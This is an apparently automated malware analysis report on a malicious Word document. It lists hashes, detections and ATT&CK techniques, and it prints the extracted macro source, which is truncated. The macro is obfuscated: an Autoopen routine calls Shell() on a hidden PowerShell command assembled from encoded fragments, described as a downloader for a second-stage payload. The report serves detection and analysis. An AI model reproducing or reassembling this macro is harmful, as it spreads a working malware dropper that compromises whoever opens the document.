Office (OLE) malware analysis — malicious · 2a1a96683eecc41e

MALICIOUS

Office (OLE)

101.8 KB Created: 2018-05-29 23:36:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 441592679f69622473c102d60b4ce66a SHA-1: 34f09e2e49b0a3b5ebbc938482e67a92f50a337c SHA-256: 2a1a96683eecc41eb3a5c69ba7963ae7077d02edc19c11fc3a0b65b35792f8aa

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls a function which, in turn, uses the Shell() function. This function constructs and executes a PowerShell command. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection and multiple VBA heuristics further support its malicious nature.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6874807-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874807-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16929 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16929 bytes
SHA-256: `6225c36ff8ba644de8c7b1d0a38c3db4ea92ee5d7f7aba831b50bf565e45b6e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WiHVDlBZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ijjsBocKkV() On Error Resume Next oTpRRo = Fix(92918 / CSng(32673) * cdwKUc * DFrihC) VhBn = CDate(44300) XQOBMM = Fix(82998 / CSng(28936) * MNiYzj * baVaT) VhBn = CDate(58285) ijjsBocKkV = FaNnfanm + RFDPOhjzz + VVzBJ + WOwJhCtU + YbvrSZwB + DwzPDN + kYHnjiOW + wJSHf + LRozM + fZiKHaOXnnt + fqLfrMArCM + PRfRvkuHjX wrObV = Fix(94284 / CSng(21432) * mwwuB * vEkkO) VhBn = CDate(23372) End Function Sub Autoopen() On Error Resume Next GtVEZl = Fix(5921 / CSng(13587) * wZtESJ * kVSZHb) VhBn = CDate(72885) RkZLfoRMj (ijjsBocKkV) FijfWl = Fix(80262 / CSng(9929) * OpwtX * LIwEAW) VhBn = CDate(1601) End Sub Function RkZLfoRMj(XYFlAAzUrw) On Error Resume Next HlGzPw = Fix(74454 / CSng(81263) * HtzuEX * wGUbpd) VhBn = CDate(21230) zLLzZKiUZPp = pPAfTutJG + Shell(kBUGrURHar + (Chr(vbKeyP)) + DKrwzwVz + XYFlAAzUrw + FYOjFt, XQbIIqFb + vbHide + iTSNDR) NZGRI = Fix(42904 / CSng(71915) * EjYuP * aIfYJr) VhBn = CDate(1071) End Function Attribute VB_Name = "BHkNItCZHi" Function FaNnfanm() On Error Resume Next KOGHdP = Fix(88282 / CSng(75855) * JHCfzd * ufBvlQ) VhBn = CDate(22037) DuzZO = "owers" + "HeLL -WinDowsTy" + "le hidden -e IA" + "AuACAAKAAoAEcAd" + "gAgACcAKgBNAE" mBNrU = Fix(38351 / CSng(44800) * uETZZ * nYwdfR) VhBn = CDate(83728) OaKDmr = "QAUgAqACcAKQAuA" + "E4AQQB" + "NAEUAWwAzACwAMQ" + "AxACwAMgBdAC" + "0AagBvAEkA" + "bgAnACc" + "AKQAgACg" zfbBRU = Fix(22585 / CSng(56963) * uDzUc * BSTmu) VhBn = CDate(14466) EvjiKrAisj = "AKAAoACIAew" + "AxADgAfQ" + "B7ADk" + "ANwB9AHsAMQAx" + "AH0AewAxADUAM" + "QB9AHsAMgA3AH0A" + "ewAxAD" + "EANwB9A" + "HsAMwA2AH0AewA" dDKLrd = Fix(98778 / CSng(16794) * tRFDiP * CCARw) VhBn = CDate(48378) zdLGZffVqNz = "3ADYAfQB7" + "ADEAMAA3AH0" + "AewA2ADMAfQB" + "7ADEANAAwA" + "H0AewA1ADQAf" + "QB7AD" + "cAMAB" cNLWu = Fix(20464 / CSng(24267) * wZWBXq * ciiwJ) VhBn = CDate(18285) QJBooEAPO = "9AHsAMQA0ADIAfQ" + "B7ADkAO" + "AB9AHsAMQAxAD" + "gAfQB7ADI" + "ANgB9AHsA" + "NQAzAH0AewAzAH" + "0AewAxADAANAB9" + "AHsAMQAwADg" PYTmzQ = Fix(68994 / CSng(88954) * cEhiwj * EwXOU) VhBn = CDate(59880) DzuVvkFTdhs = "AfQB7ADAAf" + "QB7ADQAOAB" + "9AHsANAAyA" + "H0AewA1ADEAfQB" + "7ADYAMgB" + "9AHsA" + "MQAxADA" + "AfQB7ADM" FaNnfanm = DuzZO + OaKDmr + EvjiKrAisj + zdLGZffVqNz + QJBooEAPO + DzuVvkFTdhs End Function Function RFDPOhjzz() On Error Resume Next hsczZS = Fix(75193 / CSng(3936) * MwzmC * LwvCj) VhBn = CDate(87671) siCuhOhljc = "ANQB9AHsAMgA4A" + "H0AewAxAD" + "MAfQB7A" + "DcAMwB" + "9AHsAMQA" + "wADMAf" + "QB7ADE" + "AMwAzA" qIGwbZ = Fix(97622 / CSng(72975) * LkrmuW * JbDap) VhBn = CDate(41052) SMitAjR = "H0AewAxADMA" + "OAB9AHsANwA4AH0" + "AewA3ADEAfQB7AD" + "gAOAB9AHsANQ" + "A5AH0AewA" + "zADMAfQB" + "7ADMAMQB9" + "AHsAMQ" BuEwmb = Fix(37167 / CSng(34898) * nkBUrd * NDdRkM) VhBn = CDate(90508) BlBjvWwqN = "A5AH0AewAxADIA" + "OQB9AH" + "sAOQB" + "9AHsAMQAzA" + "DcAfQB7ADYAO" + "QB9AHsAMQB9AH" Oodla = Fix(62904 / CSng(36636) * UVFBW * MKbtpD) VhBn = CDate(4677) CDYwS = "sAMwA5AH0AewAxA" + "DUANAB9AHsANw" + "A1AH0AewA2" + "ADcAfQB7AD" + "kANQB9A" + "HsANgB9" + "AHsAMQAzA" CbjkpX = Fix(22874 / CSng(7070) * oznhz * hrOUch) VhBn = CDate(96689) dVotPWTDMB = "DQAfQB7A" + "DMANAB9AHsAMgA" + "wAH0AewA3ADIAf" + "QB7ADEA" + "NAB9AHsA" RFDPOhjzz = siCuhOhljc + SMitAjR + BlBjvWwqN + CDYwS + dVotPWTDMB End Function Function VVzBJ() On Error Resume Next bUkrTq = Fix(83084 / CSng(45289) * NWmBFp * vvRTRC) VhBn = CDate(67769) kmUCrOK = "MQA0ADkAfQB7A" + "DMAMgB" + "9AHsAMQA0A" + "DUAfQB7ADQANAB9" + "AHsAMwAwAH0Ae" + "wAxADAANgB9AH" + "sANAAz" + "AH0AewA2ADYA" OLtBaj = Fix(50119 / CSng(20967) * qEQEj * NKQHZL) VhBn = CDate(22550) QGblF = "fQB7ADkAMwB9AH" + "sAMQA2AH0" + "AewAxADUAfQB7A" + "DEAMQA2" + "AH0AewA" + "1ADAAfQ" + "B7ADY" cBXYjQ = Fix(58297 / CSng(38750) ... (truncated)

SHA-256: 6225c36ff8ba644de8c7b1d0a38c3db4ea92ee5d7f7aba831b50bf565e45b6e6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WiHVDlBZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ijjsBocKkV()
On Error Resume Next
oTpRRo = Fix(92918 / CSng(32673) * cdwKUc * DFrihC)
VhBn = CDate(44300)
XQOBMM = Fix(82998 / CSng(28936) * MNiYzj * baVaT)
VhBn = CDate(58285)
ijjsBocKkV = FaNnfanm + RFDPOhjzz + VVzBJ + WOwJhCtU + YbvrSZwB + DwzPDN + kYHnjiOW + wJSHf + LRozM + fZiKHaOXnnt + fqLfrMArCM + PRfRvkuHjX
wrObV = Fix(94284 / CSng(21432) * mwwuB * vEkkO)
VhBn = CDate(23372)
End Function
Sub Autoopen()
On Error Resume Next
GtVEZl = Fix(5921 / CSng(13587) * wZtESJ * kVSZHb)
VhBn = CDate(72885)
RkZLfoRMj (ijjsBocKkV)
FijfWl = Fix(80262 / CSng(9929) * OpwtX * LIwEAW)
VhBn = CDate(1601)
End Sub
Function RkZLfoRMj(XYFlAAzUrw)
On Error Resume Next
HlGzPw = Fix(74454 / CSng(81263) * HtzuEX * wGUbpd)
VhBn = CDate(21230)
zLLzZKiUZPp = pPAfTutJG + Shell(kBUGrURHar + (Chr(vbKeyP)) + DKrwzwVz + XYFlAAzUrw + FYOjFt, XQbIIqFb + vbHide + iTSNDR)
NZGRI = Fix(42904 / CSng(71915) * EjYuP * aIfYJr)
VhBn = CDate(1071)
End Function


Attribute VB_Name = "BHkNItCZHi"
Function FaNnfanm()
On Error Resume Next
KOGHdP = Fix(88282 / CSng(75855) * JHCfzd * ufBvlQ)
VhBn = CDate(22037)
DuzZO = "owers" + "HeLL -WinDowsTy" + "le hidden -e IA" + "AuACAAKAAoAEcAd" + "gAgACcAKgBNAE"
mBNrU = Fix(38351 / CSng(44800) * uETZZ * nYwdfR)
VhBn = CDate(83728)
OaKDmr = "QAUgAqACcAKQAuA" + "E4AQQB" + "NAEUAWwAzACwAMQ" + "AxACwAMgBdAC" + "0AagBvAEkA" + "bgAnACc" + "AKQAgACg"
zfbBRU = Fix(22585 / CSng(56963) * uDzUc * BSTmu)
VhBn = CDate(14466)
EvjiKrAisj = "AKAAoACIAew" + "AxADgAfQ" + "B7ADk" + "ANwB9AHsAMQAx" + "AH0AewAxADUAM" + "QB9AHsAMgA3AH0A" + "ewAxAD" + "EANwB9A" + "HsAMwA2AH0AewA"
dDKLrd = Fix(98778 / CSng(16794) * tRFDiP * CCARw)
VhBn = CDate(48378)
zdLGZffVqNz = "3ADYAfQB7" + "ADEAMAA3AH0" + "AewA2ADMAfQB" + "7ADEANAAwA" + "H0AewA1ADQAf" + "QB7AD" + "cAMAB"
cNLWu = Fix(20464 / CSng(24267) * wZWBXq * ciiwJ)
VhBn = CDate(18285)
QJBooEAPO = "9AHsAMQA0ADIAfQ" + "B7ADkAO" + "AB9AHsAMQAxAD" + "gAfQB7ADI" + "ANgB9AHsA" + "NQAzAH0AewAzAH" + "0AewAxADAANAB9" + "AHsAMQAwADg"
PYTmzQ = Fix(68994 / CSng(88954) * cEhiwj * EwXOU)
VhBn = CDate(59880)
DzuVvkFTdhs = "AfQB7ADAAf" + "QB7ADQAOAB" + "9AHsANAAyA" + "H0AewA1ADEAfQB" + "7ADYAMgB" + "9AHsA" + "MQAxADA" + "AfQB7ADM"
FaNnfanm = DuzZO + OaKDmr + EvjiKrAisj + zdLGZffVqNz + QJBooEAPO + DzuVvkFTdhs
End Function
Function RFDPOhjzz()
On Error Resume Next
hsczZS = Fix(75193 / CSng(3936) * MwzmC * LwvCj)
VhBn = CDate(87671)
siCuhOhljc = "ANQB9AHsAMgA4A" + "H0AewAxAD" + "MAfQB7A" + "DcAMwB" + "9AHsAMQA" + "wADMAf" + "QB7ADE" + "AMwAzA"
qIGwbZ = Fix(97622 / CSng(72975) * LkrmuW * JbDap)
VhBn = CDate(41052)
SMitAjR = "H0AewAxADMA" + "OAB9AHsANwA4AH0" + "AewA3ADEAfQB7AD" + "gAOAB9AHsANQ" + "A5AH0AewA" + "zADMAfQB" + "7ADMAMQB9" + "AHsAMQ"
BuEwmb = Fix(37167 / CSng(34898) * nkBUrd * NDdRkM)
VhBn = CDate(90508)
BlBjvWwqN = "A5AH0AewAxADIA" + "OQB9AH" + "sAOQB" + "9AHsAMQAzA" + "DcAfQB7ADYAO" + "QB9AHsAMQB9AH"
Oodla = Fix(62904 / CSng(36636) * UVFBW * MKbtpD)
VhBn = CDate(4677)
CDYwS = "sAMwA5AH0AewAxA" + "DUANAB9AHsANw" + "A1AH0AewA2" + "ADcAfQB7AD" + "kANQB9A" + "HsANgB9" + "AHsAMQAzA"
CbjkpX = Fix(22874 / CSng(7070) * oznhz * hrOUch)
VhBn = CDate(96689)
dVotPWTDMB = "DQAfQB7A" + "DMANAB9AHsAMgA" + "wAH0AewA3ADIAf" + "QB7ADEA" + "NAB9AHsA"
RFDPOhjzz = siCuhOhljc + SMitAjR + BlBjvWwqN + CDYwS + dVotPWTDMB
End Function
Function VVzBJ()
On Error Resume Next
bUkrTq = Fix(83084 / CSng(45289) * NWmBFp * vvRTRC)
VhBn = CDate(67769)
kmUCrOK = "MQA0ADkAfQB7A" + "DMAMgB" + "9AHsAMQA0A" + "DUAfQB7ADQANAB9" + "AHsAMwAwAH0Ae" + "wAxADAANgB9AH" + "sANAAz" + "AH0AewA2ADYA"
OLtBaj = Fix(50119 / CSng(20967) * qEQEj * NKQHZL)
VhBn = CDate(22550)
QGblF = "fQB7ADkAMwB9AH" + "sAMQA2AH0" + "AewAxADUAfQB7A" + "DEAMQA2" + "AH0AewA" + "1ADAAfQ" + "B7ADY"
cBXYjQ = Fix(58297 / CSng(38750)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.